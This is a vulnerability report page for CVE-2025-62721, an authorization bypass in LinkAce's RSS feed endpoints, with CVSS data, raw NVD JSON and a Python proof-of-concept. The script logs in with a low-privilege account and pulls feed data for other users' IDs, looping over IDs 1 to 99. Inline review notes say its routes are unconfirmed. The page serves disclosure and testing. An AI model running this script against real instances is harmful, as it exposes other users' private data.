Security Vulnerability Report
CVE-2025-62721 CVSS 6.5 MEDIUM

CVE-2025-62721

Published: 2025-11-04 22:16:39
Last Modified: 2025-11-10 19:56:07

Description

LinkAce is a self-hosted archive to collect website links. In versions 2.3.1 and below, authenticated RSS feed endpoints in the FeedController class fail to implement proper authorization checks, allowing any authenticated user to access all links, lists, and tags from all users in the system, regardless of their ownership or visibility settings. This issue is fixed in version 2.4.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:linkace:linkace:*:*:*:*:*:*:*:* - VULNERABLE
LinkAce < 2.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
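# CVE-2025-62721 PoC - LinkAce RSS Feed Authorization Bypass
# Affected versions: LinkAce <= 2.3.1
# Fixed in: LinkAce 2.4.0
#
# NOTE(review): the feed paths and the user_id query parameter used below are
# reproduced as this page gives them. The CVE description only states that the
# authenticated RSS feed endpoints in FeedController lack authorization checks;
# confirm the exact routes against the vendor advisory before relying on a
# result from this script.
import requests
import sys

TARGET_URL = "http://target-linkace-instance.com"
ATTACKER_USERNAME = "[email protected]"  # placeholder; the address appears masked by the source page
ATTACKER_PASSWORD = "password123"
TARGET_USER_ID = 1  # ID of the target user to extract data from


def exploit():
    """Check whether a low-privilege session can read other users' feed data.

    Steps:
        1. Authenticate with a low-privilege account.
        2. Request the feed endpoints for TARGET_USER_ID.
        3. Repeat the links-feed request for user IDs 1 through 99.

    Returns:
        bool: False when the login POST does not end in HTTP 200 or when no
        feed request returned data; True when at least one feed request did.
    """
    session = requests.Session()

    # Step 1: Login with low-privilege account
    login_url = f"{TARGET_URL}/login"
    login_data = {
        "email": ATTACKER_USERNAME,
        "password": ATTACKER_PASSWORD,
    }
    response = session.post(login_url, data=login_data)
    # NOTE(review): requests follows redirects by default, so a rejected login
    # that redirects back to a form also ends in 200. A 200 here does not by
    # itself prove the session is authenticated; treat later results accordingly.
    if response.status_code != 200:
        print("[-] Login failed")
        return False
    print("[+] Login successful with low-privilege account")

    # Counts every request that came back with data. The original printed the
    # "bypass successful" line unconditionally, which reports a patched
    # instance (2.4.0) as vulnerable.
    accessed = 0

    # Step 2: Access RSS feed endpoint to bypass authorization
    # The vulnerable endpoint does not check if the requested user_id belongs
    # to the current user
    rss_urls = [
        f"{TARGET_URL}/api/feed/links?user_id={TARGET_USER_ID}",
        f"{TARGET_URL}/api/feed/lists?user_id={TARGET_USER_ID}",
        f"{TARGET_URL}/api/feed/tags?user_id={TARGET_USER_ID}",
        f"{TARGET_URL}/rss/all?user_id={TARGET_USER_ID}",
    ]
    for url in rss_urls:
        response = session.get(url)
        if response.status_code == 200:
            accessed += 1
            print(f"[+] Successfully accessed data from: {url}")
            print(f" Data preview: {response.text[:200]}...")
        else:
            print(f"[-] Failed to access: {url}")

    # Step 3: Extract all users' data by iterating through user IDs
    print("\n[*] Extracting data for all users...")
    for user_id in range(1, 100):
        url = f"{TARGET_URL}/api/feed/links?user_id={user_id}"
        response = session.get(url)
        # The length threshold skips near-empty bodies so an empty feed is not
        # counted as exposed data.
        if response.status_code == 200 and len(response.text) > 50:
            accessed += 1
            print(f"[+] User {user_id} data extracted: {len(response.text)} bytes")

    if accessed:
        print("[!] Authorization bypass successful - all users' data exposed")
        return True
    print("[-] No feed request returned data - authorization bypass not confirmed")
    return False


if __name__ == "__main__":
    exploit()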

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62721", "sourceIdentifier": "[email protected]", "published": "2025-11-04T22:16:39.120", "lastModified": "2025-11-10T19:56:06.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LinkAce is a self-hosted archive to collect website links. In versions 2.3.1 and below, authenticated RSS feed endpoints in the FeedController class fail to implement proper authorization checks, allowing any authenticated user to access all links, lists, and tags from all users in the system, regardless of their ownership or visibility settings. This issue is fixed in version 2.4.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": 
"NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linkace:linkace:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.0", "matchCriteriaId": "68ED0A13-FFAB-4927-A526-E51A4CA1B2BC"}]}]}], "references": [{"url": "https://github.com/Kovah/LinkAce/commit/1fef32694cee2bd80892fb478416be9364c3fddd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Kovah/LinkAce/releases/tag/v2.4.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Kovah/LinkAce/security/advisories/GHSA-47g2-qw6q-cr96", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/Kovah/LinkAce/security/advisories/GHSA-47g2-qw6q-cr96", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}